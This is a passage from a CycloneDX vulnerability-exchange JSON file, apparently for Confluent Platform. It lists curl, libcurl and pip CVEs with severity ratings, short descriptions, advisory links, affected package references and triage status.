          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-8458",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "libcurl might in some circumstances reuse the wrong connection when asked to\ndo Negotiate-authenticated ones, even when they are set to use different\n'services'.\n\nlibcurl features a pool of recent connections so that subsequent requests can\nreuse an existing connection to avoid overhead.\n\nWhen reusing a connection a range of criteria must be met. Due to a logical\nerror in the code, a request that was issued by an application could\nwrongfully reuse an existing connection to the same server that was\nauthenticated using different services.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8458"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8458"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8458.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8458.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8458.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-88c6-6jfq-mm4q"
        },
        {
          "url": "https://hackerone.com/reports/3721183"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8458"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8458"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T23:12:17+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-8643",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Apip"
      },
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ghsa"
          },
          "score": 8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        }
      ],
      "cwes": [
        22
      ],
      "description": "pip would treat console_scripts and gui_scripts as paths instead of file names without sanitizing the resolved absolute path to the installation directory, leading to entry points being installed outside the installation directory.",
      "recommendation": "Upgrade pip to version 26.1.2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8643"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/06/01/5"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:33313"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34374"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34456"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34739"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34740"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34741"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34748"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34749"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34750"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34752"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34756"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34758"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34765"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34772"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34773"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34774"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34775"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34776"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34777"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34778"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34780"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:34891"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36193"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:36315"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37275"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:37283"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42078"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42079"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42132"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42144"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42644"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:50479"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:54760"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:56347"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8643"
        },
        {
          "url": "https://bugzilla.redhat.com/2460927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2460927"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-8643"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-36193.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:36315"
        },
        {
          "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pip/PYSEC-2026-196.yaml"
        },
        {
          "url": "https://github.com/pypa/pip"
        },
        {
          "url": "https://github.com/pypa/pip/commit/8eb178480bd1a2b223f509fc430796b265158dfb"
        },
        {
          "url": "https://github.com/pypa/pip/pull/14000"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-8643.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-36315.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/YV63UET5D3OOJY7O4M5XCVYO2YM4NBYJ/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8643"
        },
        {
          "url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-8643.json"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8643"
        }
      ],
      "published": "2026-06-01T17:17:35+00:00",
      "updated": "2026-08-19T12:18:40+00:00",
      "affects": [
        {
          "ref": "pkg:pypi/pip@26.0.1",
          "versions": [
            {
              "version": "26.0.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:pypi/pip@26.0.1"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:pypi/pip@26.0.1"
        }
      ]
    },
    {
      "id": "CVE-2026-8924",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "critical"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "description": "A flaw in curl\u2019s cookie parsing logic allows a malicious HTTP server to set\n'super cookies' that bypass the Public Suffix List check. This enables an\nattacker-controlled origin to inject cookies that curl subsequently scopes and\ntransmits to unrelated third-party domains.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-8924"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-8924"
        },
        {
          "url": "https://curl.se/L7HzKXisfJ/CVE-2026-8924.md"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8924.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2026-8924.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-hm6c-rc5h-32m9"
        },
        {
          "url": "https://hackerone.com/reports/3733905"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-8924"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8487-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-8924"
        }
      ],
      "published": "2026-07-03T07:16:24+00:00",
      "updated": "2026-07-07T23:06:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
